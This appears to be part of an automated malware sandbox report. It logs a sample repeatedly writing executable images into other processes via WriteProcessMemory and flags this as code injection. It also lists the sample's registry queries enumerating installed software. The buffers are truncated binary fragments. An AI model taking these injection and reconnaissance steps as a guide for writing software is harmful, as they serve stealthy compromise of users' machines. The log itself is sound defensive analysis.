WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶B(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB¶B,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB..þÿÿÿ þÿÿÿuLÓôk§cßÜÆí&XÔi¾üørÕ ²l¢-µsõ^}xFÝz§ÁÆ¯µ{*C]}u¸ØwÉÇiíÖ(õ[!¼h¬=Ð)ÄI\íAÙU$þ6fyôKÈ\|`@óém0Ø8v¶¤.~%âïÇ¨ÎÝ$}DÜHYØÃWæ\ÃsS?½ïGmhO3Jê¹§)ûäa/§tR¡AºÕÿê4ÿÿ° Kñ9ãÉD}E/BçGüÜgnÅÚ9ô3/çÀ4è± ßKÎóÎ3¸õxÏ´sÜz¸ãî¨7iÓUØ¶ÔHuç¢:J4Ðar0YÆA¾¼O1lKz²E½±íZJ2`Aà5²ÆÅz±0}K!tÌwþl¢T`Dñ(4UÕæ!Fæ@ÜDÔ&ÿ®\|iª¡ý-Vôü>ê;ÂxkßÀ#3J$UnT¸?µÝòg\ç4&Ú3\|Fuw¤e«ãè £èn¢±>v5å.góFÃ\|,¡9UF~£ÇÖ¡.]PÓ0ÿoÚLåÂÆC°âæêÁ'=`SËJ¤øÒ´B\|×°'ëQ(÷«¹yl)2Ô;<÷Fýä@ÊZ%×ïÅÈÄ,Qñ´=Ï£¥£PöaS;qî.Øy´}R¤à1ÔwxS±¢ RðÈ/½î5~èÛSôÆ§S½ÜÁÙ`É5Utàô¶oý«õ`6¡âòí¦a:Æ¦m!Åcà}²{îa¯Mme®2@¾@£xbÈ^¥i>JÃå)¤±JõòÓÂ3²ÝÞo<BNPòÁbVlÎ_%Ïòrøß>Ûãù´s·äîu±ü¿c\£RôKêüM¡³¾n>÷D»5Öèõ\|9!! ÊrjH«·öã^4Ì»¢ûö©[{ ÁáâàÜxÅbýD^W·Ñà§ÃêAu»vÂiâ7ÎÕèç~¨±+¹±¼ôà~\| yì8Eõ¾¹?äµ÷¼F+>`V\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà0À¬ß à@ À@¸ÞSàN© H.text¿ À `.rsrcN©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 2820 process_handle: 0x00000120	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: Ð? base_address: 0x0043a000 process_identifier: 2820 process_handle: 0x00000120	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2820 process_handle: 0x00000120	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL²dàHvD2@õ.textytv à base_address: 0x00400000 process_identifier: 3160 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3160 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 3264 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶B(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB¶B,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB..þÿÿÿ þÿÿÿuLÓôk§cßÜÆí&XÔi¾üørÕ ²l¢-µsõ^}xFÝz§ÁÆ¯µ{*C]}u¸ØwÉÇiíÖ(õ[!¼h¬=Ð)ÄI\íAÙU$þ6fyôKÈ\|`@óém0Ø8v¶¤.~%âïÇ¨ÎÝ$}DÜHYØÃWæ\ÃsS?½ïGmhO3Jê¹§)ûäa/§tR¡AºÕÿê4ÿÿ° Kñ9ãÉD}E/BçGüÜgnÅÚ9ô3/çÀ4è± ßKÎóÎ3¸õxÏ´sÜz¸ãî¨7iÓUØ¶ÔHuç¢:J4Ðar0YÆA¾¼O1lKz²E½±íZJ2`Aà5²ÆÅz±0}K!tÌwþl¢T`Dñ(4UÕæ!Fæ@ÜDÔ&ÿ®\|iª¡ý-Vôü>ê;ÂxkßÀ#3J$UnT¸?µÝòg\ç4&Ú3\|Fuw¤e«ãè £èn¢±>v5å.góFÃ\|,¡9UF~£ÇÖ¡.]PÓ0ÿoÚLåÂÆC°âæêÁ'=`SËJ¤øÒ´B\|×°'ëQ(÷«¹yl)2Ô;<÷Fýä@ÊZ%×ïÅÈÄ,Qñ´=Ï£¥£PöaS;qî.Øy´}R¤à1ÔwxS±¢ RðÈ/½î5~èÛSôÆ§S½ÜÁÙ`É5Utàô¶oý«õ`6¡âòí¦a:Æ¦m!Åcà}²{îa¯Mme®2@¾@£xbÈ^¥i>JÃå)¤±JõòÓÂ3²ÝÞo<BNPòÁbVlÎ_%Ïòrøß>Ûãù´s·äîu±ü¿c\£RôKêüM¡³¾n>÷D»5Öèõ\|9!! ÊrjH«·öã^4Ì»¢ûö©[{ ÁáâàÜxÅbýD^W·Ñà§ÃêAu»vÂiâ7ÎÕèç~¨±+¹±¼ôà~\| yì8Eõ¾¹?äµ÷¼F+>`V\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 3264 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 3264 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3264 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 1664 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶B(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB¶B,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB..þÿÿÿ þÿÿÿuLÓôk§cßÜÆí&XÔi¾üørÕ ²l¢-µsõ^}xFÝz§ÁÆ¯µ{*C]}u¸ØwÉÇiíÖ(õ[!¼h¬=Ð)ÄI\íAÙU$þ6fyôKÈ\|`@óém0Ø8v¶¤.~%âïÇ¨ÎÝ$}DÜHYØÃWæ\ÃsS?½ïGmhO3Jê¹§)ûäa/§tR¡AºÕÿê4ÿÿ° Kñ9ãÉD}E/BçGüÜgnÅÚ9ô3/çÀ4è± ßKÎóÎ3¸õxÏ´sÜz¸ãî¨7iÓUØ¶ÔHuç¢:J4Ðar0YÆA¾¼O1lKz²E½±íZJ2`Aà5²ÆÅz±0}K!tÌwþl¢T`Dñ(4UÕæ!Fæ@ÜDÔ&ÿ®\|iª¡ý-Vôü>ê;ÂxkßÀ#3J$UnT¸?µÝòg\ç4&Ú3\|Fuw¤e«ãè £èn¢±>v5å.góFÃ\|,¡9UF~£ÇÖ¡.]PÓ0ÿoÚLåÂÆC°âæêÁ'=`SËJ¤øÒ´B\|×°'ëQ(÷«¹yl)2Ô;<÷Fýä@ÊZ%×ïÅÈÄ,Qñ´=Ï£¥£PöaS;qî.Øy´}R¤à1ÔwxS±¢ RðÈ/½î5~èÛSôÆ§S½ÜÁÙ`É5Utàô¶oý«õ`6¡âòí¦a:Æ¦m!Åcà}²{îa¯Mme®2@¾@£xbÈ^¥i>JÃå)¤±JõòÓÂ3²ÝÞo<BNPòÁbVlÎ_%Ïòrøß>Ûãù´s·äîu±ü¿c\£RôKêüM¡³¾n>÷D»5Öèõ\|9!! ÊrjH«·öã^4Ì»¢ûö©[{ ÁáâàÜxÅbýD^W·Ñà§ÃêAu»vÂiâ7ÎÕèç~¨±+¹±¼ôà~\| yì8Eõ¾¹?äµ÷¼F+>`V\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 1664 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 1664 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 1664 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 4136 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶B(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB¶B,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB..þÿÿÿ þÿÿÿuLÓôk§cßÜÆí&XÔi¾üørÕ ²l¢-µsõ^}xFÝz§ÁÆ¯µ{*C]}u¸ØwÉÇiíÖ(õ[!¼h¬=Ð)ÄI\íAÙU$þ6fyôKÈ\|`@óém0Ø8v¶¤.~%âïÇ¨ÎÝ$}DÜHYØÃWæ\ÃsS?½ïGmhO3Jê¹§)ûäa/§tR¡AºÕÿê4ÿÿ° Kñ9ãÉD}E/BçGüÜgnÅÚ9ô3/çÀ4è± ßKÎóÎ3¸õxÏ´sÜz¸ãî¨7iÓUØ¶ÔHuç¢:J4Ðar0YÆA¾¼O1lKz²E½±íZJ2`Aà5²ÆÅz±0}K!tÌwþl¢T`Dñ(4UÕæ!Fæ@ÜDÔ&ÿ®\|iª¡ý-Vôü>ê;ÂxkßÀ#3J$UnT¸?µÝòg\ç4&Ú3\|Fuw¤e«ãè £èn¢±>v5å.góFÃ\|,¡9UF~£ÇÖ¡.]PÓ0ÿoÚLåÂÆC°âæêÁ'=`SËJ¤øÒ´B\|×°'ëQ(÷«¹yl)2Ô;<÷Fýä@ÊZ%×ïÅÈÄ,Qñ´=Ï£¥£PöaS;qî.Øy´}R¤à1ÔwxS±¢ RðÈ/½î5~èÛSôÆ§S½ÜÁÙ`É5Utàô¶oý«õ`6¡âòí¦a:Æ¦m!Åcà}²{îa¯Mme®2@¾@£xbÈ^¥i>JÃå)¤±JõòÓÂ3²ÝÞo<BNPòÁbVlÎ_%Ïòrøß>Ûãù´s·äîu±ü¿c\£RôKêüM¡³¾n>÷D»5Öèõ\|9!! ÊrjH«·öã^4Ì»¢ûö©[{ ÁáâàÜxÅbýD^W·Ñà§ÃêAu»vÂiâ7ÎÕèç~¨±+¹±¼ôà~\| yì8Eõ¾¹?äµ÷¼F+>`V\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 4136 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 4136 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 4136 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà0À¬ß à@ À@¸ÞSàN© H.text¿ À `.rsrcN©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 4152 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: Ð? base_address: 0x0043a000 process_identifier: 4152 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 4152 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL²dàHvD2@õ.textytv à base_address: 0x00400000 process_identifier: 1800 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 1800 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà0À¬ß à@ À@¸ÞSàN© H.text¿ À `.rsrcN©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 3496 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: Ð? base_address: 0x0043a000 process_identifier: 3496 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3496 process_handle: 0x0000011c	1	1

Code injection by writing an executable or DLL to the memory of another process (10 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$þB `@ `¬BO`tA H.text# $ `.rsrc`&@@.reloc,@B base_address: 0x00400000 process_identifier: 2440 process_handle: 0x00000128	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà0À¬ß à@ À@¸ÞSàN© H.text¿ À `.rsrcN©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 2820 process_handle: 0x00000120	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL²dàHvD2@õ.textytv à base_address: 0x00400000 process_identifier: 3160 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 3264 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 1664 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 4136 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà0À¬ß à@ À@¸ÞSàN© H.text¿ À `.rsrcN©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 4152 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL²dàHvD2@õ.textytv à base_address: 0x00400000 process_identifier: 1800 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà0À¬ß à@ À@¸ÞSàN© H.text¿ À `.rsrcN©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 3496 process_handle: 0x0000011c	1	1

Collects information about installed applications (50 out of 190 events)

Time & API	Arguments	Status
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
